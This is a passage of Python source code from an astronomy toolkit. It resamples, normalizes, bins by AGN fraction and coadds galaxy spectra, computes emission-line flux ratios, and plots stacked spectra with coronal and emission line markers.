Mutually incompatible with 'bin' and its related arguments.\n\n :return None:\n \"\"\"\n self.correct_spectra()\n self.filter_spectra()\n self.universal_grid = []\n self.stacked_flux = []\n self.stacked_err = []\n if stack_all_agns:\n if not bpt_1 or not bpt_2:\n raise ValueError(\"Must specify BPT ratio keys if stacking all AGNs!\")\n\n # Calculate the statistic to cut by and get the spectra that qualify\n spectra = np.array([], dtype=str)\n for i, ispec in enumerate(self):\n agn = self[ispec].k01_agn_class(bpt_1, bpt_2)\n if agn:\n spectra = np.append(spectra, ispec)\n\n # Stack only the qualified spectra\n if len(spectra) == 0:\n self.universal_grid.append(None)\n self.stacked_flux.append(None)\n self.stacked_err.append(None)\n return\n\n wave_grid_b, spectra = self.uniform_wave_grid(spectra)\n self.resample(wave_grid_b, spectra)\n if auto_norm_region:\n nr0, nr1 = self.calc_norm_region(wave_grid_b)\n else:\n nr0, nr1 = self.norm_region\n self.normalize(wave_grid_b, (nr0, nr1), spectra)\n if self.wave_criterion == 'strict':\n wave_grid_b, flux_b, err_b = self.coadd(wave_grid_b, spectra)\n elif self.wave_criterion == 'lenient':\n wave_grid_b, flux_b, err_b, specnames_fb, specnames_eb, nspec_fb, nspec_eb = \\\n self.coadd(wave_grid_b, spectra, save_specnames=True)\n self.specnames_f.append(specnames_fb)\n self.specnames_e.append(specnames_eb)\n self.nspec_f.append(nspec_fb)\n self.nspec_e.append(nspec_eb)\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n self.universal_grid.append(wave_grid_b)\n self.stacked_flux.append(flux_b)\n self.stacked_err.append(err_b)\n\n elif bin_name:\n if bin_name == 'agn_frac':\n\n if not bpt_1 or not bpt_2:\n raise ValueError(\"Must specify BPT ratio keys if binning by AGN fraction!\")\n\n # First find the optimal point to use as a reference point\n dx = np.zeros(len(self))\n dy = np.zeros(len(self))\n for i, ispec in enumerate(self):\n dx[i], dy[i] = self[ispec]._calc_agn_dist(bpt_1, bpt_2, ref_point=(0, 0))\n\n # Solve for the optimal reference point so the highest bin has at least 3 spectra\n def num_in_highest_bin(ref_point_shift, target_num, bin_size=None, nbins=None, round_bins=None):\n ref_point = (np.nanmax(dx), np.nanmax(dy)) + ref_point_shift\n agn_fracs = np.zeros(len(self))\n # Now calculate the AGN fractions using this distance\n for i, ispec in enumerate(self):\n agn_fracs[i] = self[ispec].calc_agn_frac(bpt_1, bpt_2, ref_point=ref_point)\n # Normalize so that the largest AGN frac is 1\n max_frac = np.nanmax(agn_fracs)\n agn_fracs /= max_frac\n\n minbin = np.nanmin(agn_fracs)\n maxbin = 1\n if nbins and not bin_size:\n bin_size = (maxbin - minbin) / nbins\n if round_bins:\n rating = 1 / round_bins\n bin_size = np.round(bin_size * rating) / rating\n if bin_size == 0:\n bin_size = round_bins\n counts = len(np.where(agn_fracs >= 1 - bin_size)[0])\n\n print('Current number in highest bin: %03d' % counts, end='\\r', flush=True)\n if counts > target_num:\n return 0\n else:\n return -1 * counts\n\n # USE POWELL METHOD\n print('Optimizing AGN fraction reference point...')\n min_res = scipy.optimize.minimize(num_in_highest_bin, 0,\n args=(hbin_target, bin_size, nbins, round_bins), method='Powell')\n shift = min_res.x\n print('\\n')\n\n # Calculate final AGN fractions from the optimized reference point\n ref_point = (np.nanmax(dx), np.nanmax(dy)) + shift\n agn_fracs = np.zeros(len(self))\n for i, ispec in enumerate(self):\n agn_fracs[i] = self[ispec].calc_agn_frac(bpt_1, bpt_2, ref_point=ref_point)\n max_frac = np.nanmax(agn_fracs)\n 
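# Normalize by the maximum so the largest AGN fraction is exactly 1, and store each value in the\n                # spectrum's data dict so that bin_spectra can later bin on the 'agn_frac' key\n                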
for i, ispec in enumerate(self):\n agn_fracs[i] /= max_frac\n self[ispec].data[\"agn_frac\"] = agn_fracs[i]\n self.agn_ref_pt = ref_point\n\n binned_spectra, bin_counts, bin_edges = self.bin_spectra(bin_name, bin_size=bin_size, nbins=nbins, log=log,\n round_bins=round_bins)\n nn = len(binned_spectra)\n for i, b in enumerate(binned_spectra):\n print(f'BIN {i + 1} OF {nn}...')\n spectra = binned_spectra[b]\n if len(spectra) == 0:\n self.universal_grid.append(None)\n self.stacked_flux.append(None)\n self.stacked_err.append(None)\n continue\n wave_grid_b, spectra = self.uniform_wave_grid(spectra)\n self.resample(wave_grid_b, spectra)\n if auto_norm_region:\n nr0, nr1 = self.calc_norm_region(wave_grid_b)\n else:\n nr0, nr1 = self.norm_region\n self.normalize(wave_grid_b, (nr0, nr1), spectra)\n if self.wave_criterion == 'strict':\n wave_grid_b, flux_b, err_b = self.coadd(wave_grid_b, spectra)\n elif self.wave_criterion == 'lenient':\n wave_grid_b, flux_b, err_b, specnames_fb, specnames_eb, nspec_fb, nspec_eb = \\\n self.coadd(wave_grid_b, spectra, save_specnames=True)\n self.specnames_f.append(specnames_fb)\n self.specnames_e.append(specnames_eb)\n self.nspec_f.append(nspec_fb)\n self.nspec_e.append(nspec_eb)\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n self.universal_grid.append(wave_grid_b)\n self.stacked_flux.append(flux_b)\n self.stacked_err.append(err_b)\n self.binned = bin_name\n self.binned_spec = binned_spectra\n self.bin_counts = bin_counts\n self.bin_edges = bin_edges\n else:\n wave_grid, _ = self.uniform_wave_grid()\n self.resample(wave_grid)\n if auto_norm_region:\n nr0, nr1 = self.calc_norm_region(wave_grid)\n else:\n nr0, nr1 = self.norm_region\n self.normalize(wave_grid, (nr0, nr1))\n if self.wave_criterion == 'strict':\n wave_grid, flux, err = self.coadd(wave_grid)\n elif self.wave_criterion == 'lenient':\n wave_grid, flux, err, specnames_f, specnames_e, nspec_f, nspec_e = \\\n self.coadd(wave_grid, save_specnames=True)\n self.specnames_f.append(specnames_f)\n self.specnames_e.append(specnames_e)\n self.nspec_f.append(nspec_f)\n self.nspec_e.append(nspec_e)\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n self.universal_grid.append(wave_grid)\n self.stacked_flux.append(flux)\n self.stacked_err.append(err)\n self.binned = None\n self.binned_spec = None\n self.bin_counts = None\n self.bin_edges = None\n\n def correct_spectra(self):\n \"\"\"\n Spectra.correct_spectra method now using the instance attribute self.r_v as the argument\n\n :return None:\n \"\"\"\n print('Correcting spectra to rest-frame wavelengths and adjusting for galactic extinction...')\n super().correct_spectra(r_v=self.r_v)\n\n def uniform_wave_grid(self, binned_spec=None):\n \"\"\"\n Create a uniform grid of wavelengths with spacing gridspace, covering only the regions where all spectra in\n the dictionary overlap.\n\n :param binned_spec: iterable\n A list of spectra names to use. 
If None, all are used.\n :return wave_grid:\n The universal wave grid.\n :return all_names:\n The names of the spectra that remain on the grid.\n \"\"\"\n print('Calculating a universal wave grid...')\n all_names = binned_spec if binned_spec is not None else np.array([s for s in self], dtype=str)  # np.str was removed from NumPy; the builtin str is equivalent\n binned_indices = np.array([self.get_spec_index(name) for name in all_names], dtype=int)\n wave = self.to_numpy('wave')['wave'][binned_indices]\n if self.wave_criterion == 'strict':\n wmin = None\n wmax = None\n removed_names = np.array([], dtype=int)\n for i, wi in enumerate(wave):\n remove = False\n if self.norm_region:\n if np.where((self.norm_region[0] - 5 < wi) & (self.norm_region[0] + 5 > wi))[0].size == 0 or \\\n np.where((self.norm_region[1] - 5 < wi) & (self.norm_region[1] + 5 > wi))[0].size == 0:\n remove = True\n if not remove:\n if wmin is None or wmax is None:\n wmin = np.nanmin(wi)\n wmax = np.nanmax(wi)\n continue\n imin = np.nanmin(wi)\n if imin > wmin:\n if np.abs(imin - wmin) > self.tolerance:\n remove = True\n else:\n wmin = imin\n imax = np.nanmax(wi)\n if imax < wmax:\n if np.abs(imax - wmax) > self.tolerance:\n remove = True\n else:\n wmax = imax\n if remove:\n print(\n f\"WARNING: Removing spectrum {i + 1}: {all_names[i]} due to insufficient wavelength coverage.\")\n del self[all_names[i]]\n removed_names = np.append(removed_names, i)\n all_names = np.delete(all_names, removed_names)\n elif self.wave_criterion == 'lenient':\n wmin = 1e100\n wmax = -1e100\n for i, wi in enumerate(wave):\n imin = np.nanmin(wi)\n imax = np.nanmax(wi)\n if imin < wmin:\n wmin = imin\n if imax > wmax:\n wmax = imax\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n\n wave_grid = np.arange(int(wmin), int(wmax) + self.gridspace, self.gridspace)\n return wave_grid, all_names\n\n def resample(self, wave_grid, binned_spec=None):\n \"\"\"\n Resample the current spectra to a new, uniform wavelength grid while preserving flux and error across the\n interpolation.\n\n :param wave_grid: np.ndarray\n The grid of wavelengths to resample to.\n :param binned_spec: iterable\n A list of spectra names to use. If None, all are used.\n :return None:\n \"\"\"\n print('Resampling spectra over a uniform wave grid...')\n ss = binned_spec if binned_spec is not None else [s for s in self]\n range_ = tqdm.tqdm(ss) if self.progress_bar else ss\n for ispec in range_:\n self[ispec].flux, self[ispec].error = \\\n maths.spectres(wave_grid, self[ispec].wave, self[ispec].flux,\n self[ispec].error, fill=np.nan,\n verbose=(self.wave_criterion != 'lenient'))\n self[ispec].wave = wave_grid\n print('Done.')\n\n def normalize(self, wave_grid, norm_region, binned_spec=None):\n \"\"\"\n Normalize all spectra by the median of the normalization region.\n\n :param wave_grid: np.ndarray\n The grid of wavelengths to resample to.\n :param norm_region: tuple\n The left and right edges of wavelength to normalize by.\n :param binned_spec: iterable\n A list of spectra names to use. 
If None, all are used.\n :return None:\n \"\"\"\n print('Normalizing spectra...')\n # Use the first spectra's wave since by this point they should all be equal anyways,\n # to calculate the region to fit\n reg = np.where((norm_region[0] < wave_grid) & (wave_grid < norm_region[1]))[0]\n ss = binned_spec if binned_spec is not None else [s for s in self]\n range_ = tqdm.tqdm(ss) if self.progress_bar else ss\n for ispec in range_:\n self[ispec].flux, self[ispec].error = self._norm(self[ispec].flux, self[ispec].error, reg)\n self[ispec]._normalized = True\n print('Done.')\n\n @staticmethod\n @njit\n def _norm(data, error, region):\n med = np.nanmedian(data[region])\n data_out = data / med\n error_out = error / med\n return data_out, error_out\n\n # def _renorm_stack(self, norm_region):\n # \"\"\"\n # Renormalize the stacked spectra and all individual spectra within each stack to a new normalization region.\n #\n # :param norm_region: tuple\n # The new lower and upper limits for the region to normalize by.\n # :return None:\n # \"\"\"\n # for i in range(len(self.stacked_flux)):\n # reg = np.where((norm_region[0] < self.universal_grid[i]) & (self.universal_grid[i] < norm_region[1]))[0]\n # med = np.nanmedian(self.stacked_flux[i][reg])\n # self.stacked_flux[i] /= med\n # if self.binned_spec:\n # ss = self.binned_spec[i]\n # else:\n # ss = self\n # for ispec in ss:\n # medi = np.nanmedian(self[ispec].flux[reg])\n # self[ispec].flux /= medi\n\n def coadd(self, wave_grid, binned_spec=None, save_specnames=False):\n \"\"\"\n Coadd all spectra together into a single, stacked spectrum, using 1/sigma**2 as the weights.\n\n :param wave_grid: np.ndarray\n The grid of wavelengths to resample to.\n :param binned_spec: iterable\n A list of spectra names to use. If None, all are used.\n :param save_specnames: bool\n Whether or not to save the names and numbers of spectra that are coadded at each wavelength point.\n :return None:\n \"\"\"\n stacked_flux = np.zeros_like(wave_grid, dtype=np.float64)\n stacked_err = np.zeros_like(wave_grid, dtype=np.float64)\n\n print('Coadding spectra...')\n ss = binned_spec if binned_spec is not None else [s for s in self]\n specnames_f = np.ndarray(wave_grid.size, dtype=object)\n specnames_e = np.ndarray(wave_grid.size, dtype=object)\n nspec_f = np.zeros_like(wave_grid)\n nspec_e = np.zeros_like(wave_grid)\n range_ = tqdm.trange(len(wave_grid)) if self.progress_bar else range(len(wave_grid))\n for i in range_:\n flux_i = np.array([self[name].flux[i] for name in ss])\n err_i = np.array([self[name].error[i] for name in ss])\n if save_specnames:\n specnames_f[i] = np.array([name for name in ss if np.isfinite(self[name].flux[i])])\n specnames_e[i] = np.array([name for name in ss if np.isfinite(self[name].error[i])])\n nspec_f[i] = specnames_f[i].size\n nspec_e[i] = specnames_e[i].size\n if len(ss) > 1:\n stacked_flux[i], stacked_err[i] = self._coadd_flux_err(flux_i, err_i)\n else:\n stacked_flux[i], stacked_err[i] = flux_i, err_i\n\n good = np.where(np.isfinite(stacked_flux) & np.isfinite(stacked_err))[0]\n print('Done.')\n if save_specnames:\n return wave_grid[good], stacked_flux[good], stacked_err[good], specnames_f[good], specnames_e[good], \\\n nspec_f[good], nspec_e[good]\n else:\n return wave_grid[good], stacked_flux[good], stacked_err[good]\n\n @staticmethod\n @njit\n def _coadd_flux_err(flux, error):\n weights = 1 / error ** 2\n M = len(np.where(weights > 0)[0])\n if np.isnan(flux).all() or np.isnan(error).all() or M <= 1:\n return np.nan, np.nan\n stacked_flux = 
np.nansum(flux * weights) / np.nansum(weights)\n stacked_err = np.sqrt(\n np.nansum((flux - stacked_flux) ** 2 * weights) / ((M - 1) / M * np.nansum(weights))\n )\n # stacked_err = np.sqrt(1/np.nansum(weights))\n return stacked_flux, stacked_err\n\n @utils.timer(name='Line Flux Integration')\n def calc_line_flux_ratios(self, line, dw=5, tag='', sky_lines=None, sky_penalty=False, save=False, conf=None, path=''):\n \"\"\"\n Calculate the F-number of each spectrum: F = mean flux / RMS of the surrounding spectrum.\n :param line: float, int\n The center wavelength at which to integrate (angstroms).\n :param dw: float, int\n The distance to the left/right of the center wavelength to integrate (angstroms).\n :param tag: string\n An optional tag string to add to the end of saved file names.\n :param sky_lines: optional, list\n Wavelengths of sky lines to watch out for -- flag if the line is close to a sky line.\n :param save: boolean\n If True, saves the line flux ratios as a toml file.\n :param conf: str\n Key for a confidence parameter in each spectrum's dictionary to compare to the line flux ratios.\n :param path: str\n Output path for the toml file if 'save' is True.\n :return out: dict\n Dictionary of keys: spectra names, and values: tuple(integrated flux, error) / stacked spectrum integrated\n flux.\n \"\"\"\n if sky_lines is None:\n sky_lines = [5578.5, 5894.6, 6301.7, 7246.0]\n out = {}\n confs = {}\n info = {}\n self.correct_spectra()\n # if len(self.universal_grid) == 0:\n # raise ValueError(\"Stacked spectrum has not yet been generated!\")\n # self._renorm_stack((line-norm_dw, line+norm_dw))\n range_ = tqdm.trange(len(self)) if self.progress_bar else range(len(self))\n\n # The reference regions need to be adjusted for certain lines since other lines are at +/-30 angstroms and\n # can bias the result.\n _wr = 30\n _wl = 30\n if 5275 < line < 5277:\n _wr += 55\n elif 5302 < line < 5304:\n _wl += 30\n _wr += 30\n elif 5308 < line < 5310:\n _wl += 30\n _wr += 30\n elif 5334 < line < 5336:\n _wl += 55\n elif 5719 < line < 5721:\n _wr += 30\n for i in range_:\n # Define wavelength windows\n window_center = (self[i].wave > line - dw) & (self[i].wave < line + dw)\n window_left = (self[i].wave > line - dw - _wl) & (self[i].wave < line + dw - _wl)\n window_right = (self[i].wave > line - dw + _wr) & (self[i].wave < line + dw + _wr)\n\n if len(window_center) < int(2 * dw) or len(window_left) < int(2 * dw) or len(window_right) < int(2 * dw):\n print(f\"WARNING: {self[i].name} spectrum does not have sufficient wavelength coverage in the\"\n f\" integration region.\")\n continue\n bad = ~np.isfinite(self[i].flux) | ~np.isfinite(self[i].wave)\n if len(np.where(bad & window_center)[0]) >= 3 or len(np.where(bad & window_left)[0]) >= 3 or len(\n np.where(bad & window_right)[0]) >= 3:\n print(f\"WARNING: {self[i].name} spectrum does not have sufficient wavelength coverage in the \"\n f\"integration region.\")\n continue\n # window_center = np.where(window_center)[0]\n window_left = np.where(window_left)[0]\n window_right = np.where(window_right)[0]\n\n # Normalize stack in the region of interest\n window_full = np.where((self[i].wave > line - dw - _wl) & (self[i].wave < line + dw + _wr))[0]\n flux_norm, err_norm = self._norm(self[i].flux, self[i].error, window_full)\n\n # Calculate a linear trend\n mean_left = np.nanmean(flux_norm[window_left])\n mean_right = np.nanmean(flux_norm[window_right])\n slope = (mean_right - mean_left) / (_wl + _wr)\n intercept = mean_left - slope * (line - _wl)\n\n full_wave = 
self[i].wave[window_full]\n y = slope * full_wave + intercept\n\n # Detrend with the line\n full_flux = flux_norm[window_full] - y\n\n # Calculate mean / RMS\n window_lr = np.where(((full_wave > line - dw - _wl) & (full_wave < line + dw - _wl)) | (\n (full_wave > line - dw + _wr) & (full_wave < line + dw + _wr)))[0]\n window_center = np.where((full_wave > line - dw) & (full_wave < line + dw))[0]\n rms = np.sqrt(np.mean(full_flux[window_lr] ** 2))\n\n # The 0 key is for compatibility with older versions\n out[self[i].name] = (np.mean(full_flux[window_center]) / rms).astype(np.float64)\n # Sigma-clipping to find the width of the line in pixels\n info[self[i].name] = {}\n npix = np.where(full_flux[window_center] >= 3*rms)[0]\n cont = np.where(np.diff(npix) < 2)[0]\n # pixels = len(cont) + 1 if np.diff(npix)[-1] in np.diff(npix)[cont] else len(cont)\n goodpix = [] if len(npix) == 0 else npix[np.concatenate((cont, [-1]))]\n info[self[i].name]['npix'] = len(goodpix)\n for _line in sky_lines:\n rest = maths.cosmological_redshift(_line, self[i].redshift)\n info[self[i].name][f'sky_flag_{_line}'] = 1 if np.abs(rest - line) <= 2*dw else 0\n if conf:\n confs[self[i].name] = self[i].data[conf]\n\n if sky_penalty and self[i].sky is not None:\n # Repeat the F-ratio procedure for the sky flux\n sky_norm, sky_err = self._norm(self[i].sky, self[i].error, window_full)\n mean_left = np.nanmean(sky_norm[window_left])\n mean_right = np.nanmean(sky_norm[window_right])\n slope = (mean_right - mean_left) / (_wl + _wr)\n intercept = mean_left - slope * (line - _wl)\n\n y = slope * full_wave + intercept\n\n full_sky = sky_norm[window_full] - y\n\n rms = np.sqrt(np.mean(full_sky[window_lr] ** 2))\n\n out[self[i].name] -= (np.mean(full_sky[window_center]) / rms).astype(np.float64)\n\n if conf:\n confs[self[i].name] = self[i].data[conf]\n\n # breakpoint()\n\n # OLD INTEGRATION METHOD, DEPRECATED, COMPARING WITH STACK:\n # for i in range(len(self.universal_grid)):\n # print(f\"BIN {i+1} of {len(self.universal_grid)}...\")\n # cspline_stack = scipy.interpolate.CubicSpline(self.universal_grid[i], self.stacked_flux[i],\n # extrapolate=False)\n #\n # baseline, err = scipy.integrate.quad(cspline_stack.__call__, line-dw, line+dw)\n # out[i] = {\"stack\": (baseline, err)}\n # confs[i] = {}\n # if self.binned_spec:\n # ss = self.binned_spec[i]\n # else:\n # ss = self\n # print('Calculating relative line flux ratios...')\n # range_ = tqdm.tqdm(ss) if self.progress_bar else ss\n # for ispec in range_:\n # good = np.isfinite(self[ispec].wave) & np.isfinite(self[ispec].flux) & np.isfinite(self[ispec].error)\n # region = (line-dw < self[ispec].wave) & (self[ispec].wave < line+dw)\n # bad = ~np.isfinite(self[ispec].error) | ~np.isfinite(self[ispec].flux) |\n # ~np.isfinite(self[ispec].wave)\n # if len(np.where(bad & region)[0]) >= 3:\n # print(f\"WARNING: {ispec} spectrum has undefined datapoints in the line region! 
\"\n # f\"Cannot calculate relative line flux.\")\n # continue\n # good = np.where(good)[0]\n # csplinei = scipy.interpolate.CubicSpline(self[ispec].wave[good], self[ispec].flux[good],\n # extrapolate=False)\n # intflux, erri = scipy.integrate.quad(csplinei.__call__, line-dw, line+dw)\n # out[i][ispec] = (intflux/baseline, err/baseline)\n # if conf:\n # confs[i][ispec] = self[ispec].data[conf]\n # print('Done.')\n\n if save:\n with open(path + os.sep + 'line_flux_ratios_' + str(line) + '_' + tag + '.toml', 'w') as handle:\n toml.dump(out, handle, encoder=toml.TomlNumpyEncoder())\n with open(path + os.sep + 'line_flux_info_' + str(line) + '_' + tag + '.toml', 'w') as handle:\n toml.dump(info, handle, encoder=toml.TomlNumpyEncoder())\n if conf:\n return _wl, _wr, out, confs, info\n else:\n return _wl, _wr, out, info\n\n def plot_stacked(self, fname_base, emline_color=\"rebeccapurple\", absorp_color=\"darkgoldenrod\", cline_color=\"cyan\",\n cline_labels='all', backend='plotly'):\n \"\"\"\n Plot the stacked spectrum.\n\n :param fname_base: str\n The path and file name to save the figure to.\n :param emline_color: str\n If backend is 'pyplot', this specifies the color of the plotted emission lines. Default is 'rebeccapurple'.\n :param absorp_color: str\n If backend is 'pyplot', this specifies the color of the plotted absorption lines. Default is\n 'darkgoldenrod'.\n :param cline_color: str\n If backend is 'pyplot', this specifies the color of the plotted coronal lines. Default is 'cyan'.\n :param cline_labels: str, list\n Which coronal line labels to include. If 'all', include all labels. Applies only if backend is 'plotly'.\n :param backend: str\n May be 'pyplot' to use the pyplot module or 'plotly' to use the plotly module for plotting. Default is\n 'plotly'.\n :return None:\n \"\"\"\n format0 = '.html' if backend == 'plotly' else '.pdf'\n assert self.universal_grid is not None, \"Universal grid has not yet been calculated!\"\n assert self.stacked_flux is not None, \"Stacked flux has not yet been calculated!\"\n assert self.stacked_err is not None, \"Stacked error has not yet been calculated!\"\n\n for bin_num in range(len(self.universal_grid)):\n format1 = '_' + str(bin_num) + format0\n fname = fname_base + format1\n wave = self.universal_grid[bin_num]\n flux = self.stacked_flux[bin_num]\n err = self.stacked_err[bin_num]\n if wave is None or flux is None or err is None:\n continue\n\n # Plot the spectrum and error\n if backend == 'pyplot':\n if self.wave_criterion == 'strict':\n fig, ax = plt.subplots(figsize=(40, 10))\n ax.set_xlabel(r'$\\lambda_{\\rm{rest}}$ ($\\rm{\\AA}$)', fontsize=20)\n elif self.wave_criterion == 'lenient':\n gs = gridspec.GridSpec(nrows=20, ncols=20)\n fig = plt.figure(constrained_layout=True)\n ax = fig.add_subplot(gs[0:18, :18])\n ax.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False) # labels along the bottom edge are off\n ax2 = fig.add_subplot(gs[19, :18], sharex=ax)\n ax2.set_xlabel(r'$\\lambda_{\\rm{rest}}$ ($\\rm{\\AA}$)', fontsize=20)\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n linewidth = .5\n linestyle = '--'\n ax.plot(wave, flux, '-', color='k', lw=linewidth)\n ax.fill_between(wave, flux - err, flux + err, color='mediumaquamarine', alpha=0.5)\n if self.wave_criterion == 'lenient':\n extent = [wave[0] - (wave[1] - wave[0]) / 2., wave[-1] + (wave[1] 
- wave[0]) / 2., 0, 1]\n nspec = ax2.imshow(self.nspec_f[bin_num][np.newaxis, :], aspect='auto', cmap='plasma',\n extent=extent)\n fig.colorbar(nspec, cax=fig.add_subplot(gs[:, 19]), label='Number of Galaxies')\n\n # Plot emission and absorption lines\n\n # OVI, Ly-alpha, NV, OI, CII, SiIV, SiIV/OIV, CIV, HeII\n # OIII, AlIII, CIII, CII, NeIV, MgII, NeV, NeVI, [OII]\n # [OII], H-delta, H-gamma, [OIII], H-beta, [OIII], [OIII], [OI], [OI]\n # [FeX], [NII], H-alpha, [NII], [SII], [SII], [FeXI]\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3727.092,\n 3729.875, 4102.890, 4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6549.860, 6564.610, 6585.270, 6718.290, 6732.670])\n\n for line in emlines:\n ax.axvline(line, color=emline_color, lw=linewidth, linestyle=linestyle, alpha=0.5)\n\n # Ne V, Ne V*, Fe VII, Fe V, Fe V, Ne III (not coronal), Fe V, Fe VII, Fe VI, Fe VII, Fe VI, Fe VII,\n # Fe XIV, Ca V, Fe VI, Ar X, Fe VII, Fe VII*, Fe X, Fe XI\n clines = np.array(\n [3346.790, 3426.850, 3759, 3839, 3891, 3970, 4181, 4893, 5146, 5159, 5176, 5276, 5303, 5309, 5335,\n 5533, 5720, 6087, 6374.510, 7891.800])\n for line in clines:\n ax.axvline(line, color=cline_color, lw=linewidth * 2, linestyle=linestyle, alpha=0.75)\n\n # Ca K, Ca H, Mg1b, Na, CaII, CaII, CaII\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n for line in abslines:\n ax.axvline(line, color=absorp_color, lw=linewidth, linestyle=linestyle, alpha=0.5)\n\n # Set up axis labels and formatting\n fontsize = 20\n ax.set_ylabel(r'$f_\\lambda$ (normalized)', fontsize=fontsize)\n ax.set_title('%s' % 'Stacked Spectrum', fontsize=fontsize)\n ax.tick_params(axis='both', labelsize=fontsize - 2)\n ax.set_xlim(np.nanmin(wave), np.nanmax(wave))\n ax.set_ylim(0., np.nanmax(flux) + .3)\n\n fig.savefig(fname, dpi=300, bbox_inches='tight')\n plt.close()\n elif backend == 'plotly':\n fig = plotly.subplots.make_subplots(rows=1, cols=1)\n linewidth = .5\n if self.wave_criterion == 'lenient':\n fig.add_trace(\n plotly.graph_objects.Heatmap(x=wave, y=np.array([0] * len(wave)), z=self.nspec_f[bin_num],\n colorbar=dict(title='Number of spectra'),\n name='Number of Spectra', showlegend=False))\n text = [str(self.nspec_f[bin_num][i]) for i in range(len(self.nspec_f[bin_num]))]\n elif self.wave_criterion == 'strict':\n text = [str(len(self)) for _ in range(len(self.stacked_flux[bin_num]))]\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n good = np.where(np.isfinite(flux) & np.isfinite(err))[0]\n fig.add_trace(plotly.graph_objects.Scatter(x=wave, y=flux, line=dict(color='black', width=linewidth),\n name='Data', showlegend=False, text=text,\n hovertemplate='%{y} Number of Spectra: %{text}'))\n fig.add_trace(plotly.graph_objects.Scatter(x=wave[good], y=(flux + err)[good],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n name='Upper Bound', showlegend=False, hovertemplate='%{y}'))\n fig.add_trace(plotly.graph_objects.Scatter(x=wave[good], y=(flux - err)[good],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n fill='tonexty', name='Lower Bound', showlegend=False,\n hovertemplate='%{y}'))\n\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3727.092,\n 3729.875, 4102.890, 
4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6549.860, 6564.610, 6585.270, 6718.290, 6732.670])\n clines = np.array(\n [3346.790, 3426.850, 3759, 3839, 3891, 3970, 4181, 4893, 5146, 5159, 5176, 5276, 5303, 5309, 5335,\n 5533, 5720, 6087, 6374.510, 7891.800])\n cline_names = np.array(\n ['[Ne V]', '[Ne V]*', '[Fe VII]', '[Fe V]', '[Fe V]', '[Ne III]', '[Fe V]', '[Fe VII]', '[Fe VI]',\n '[Fe VII]', '[Fe VI]', '[Fe VII]', '[Fe XIV]', '[Ca V]', '[Fe VI]', '[Ar X]', '[Fe VII]',\n '[Fe VII]*',\n '[Fe X]', '[Fe XI]'], dtype=str\n )\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n for line in emlines:\n fig.add_vline(x=line, line_width=linewidth, line_dash='dash', line_color='#663399')\n for line, name in zip(clines, cline_names):\n if cline_labels == 'all' or (type(cline_labels) is list and name in cline_labels):\n fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666',\n annotation_text=name, annotation_position='top right', annotation_font_size=12)\n for line in abslines:\n fig.add_vline(x=line, line_width=linewidth, line_dash='dash', line_color='#d1c779')\n title = 'Stacked Spectra'\n fig.update_layout(\n yaxis_title='$f_{\\\\lambda}\\\\ ({\\\\rm normalized})$',\n xaxis_title='$\\\\lambda_{\\\\rm rest}\\\\ (Å)$',\n title=title,\n hovermode='x unified',\n template='plotly_white'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n fig.update_xaxes(\n range=(np.nanmin(wave), np.nanmax(wave)),\n constrain='domain'\n )\n fig.update_yaxes(\n range=(0, np.nanmax(flux) + err[np.nanargmax(flux)] + .3),\n constrain='domain'\n )\n fig.write_html(fname, include_mathjax=\"cdn\")\n # fig.write_image(fname.replace('.html', '.pdf'), width=1280, height=540)\n\n def plot_spectra(self, fname_root, spectra='all', _range=None, ylim=None, title_text=None, backend='plotly',\n plot_model=None, f=None, shade_reg=None, normalized=False):\n \"\"\"\n Spectra.plot_spectra but incorporates the information from self.normalized.\n\n \"\"\"\n print('Plotting spectra...')\n fmt = '.html' if backend == 'plotly' else '.pdf'\n if not os.path.exists(fname_root):\n os.makedirs(fname_root)\n if type(spectra) is str:\n if spectra == 'all':\n for i, item in enumerate(tqdm.tqdm(self)):\n ttl = None if title_text is None else title_text[item]\n if _range:\n good = np.where((self[item].wave > _range[0]) & (self[item].wave < _range[1]))[0]\n if good.size < 10:\n continue\n if f is not None:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n else:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n self[item].plot(fname=fname,\n backend=backend, _range=_range, ylim=ylim, title_text=ttl, plot_model=plot_model,\n shade_reg=shade_reg, normalized=normalized)\n else:\n for i, item in enumerate(tqdm.tqdm(self)):\n if item in spectra:\n if item not in self or item not in title_text:\n print(f'WARNING: {item} not found in stack!')\n continue\n if _range:\n good = np.where((self[item].wave > _range[0]) & (self[item].wave < _range[1]))[0]\n if good.size < 10:\n continue\n ttl = None if title_text is None else title_text[item]\n if f is not 
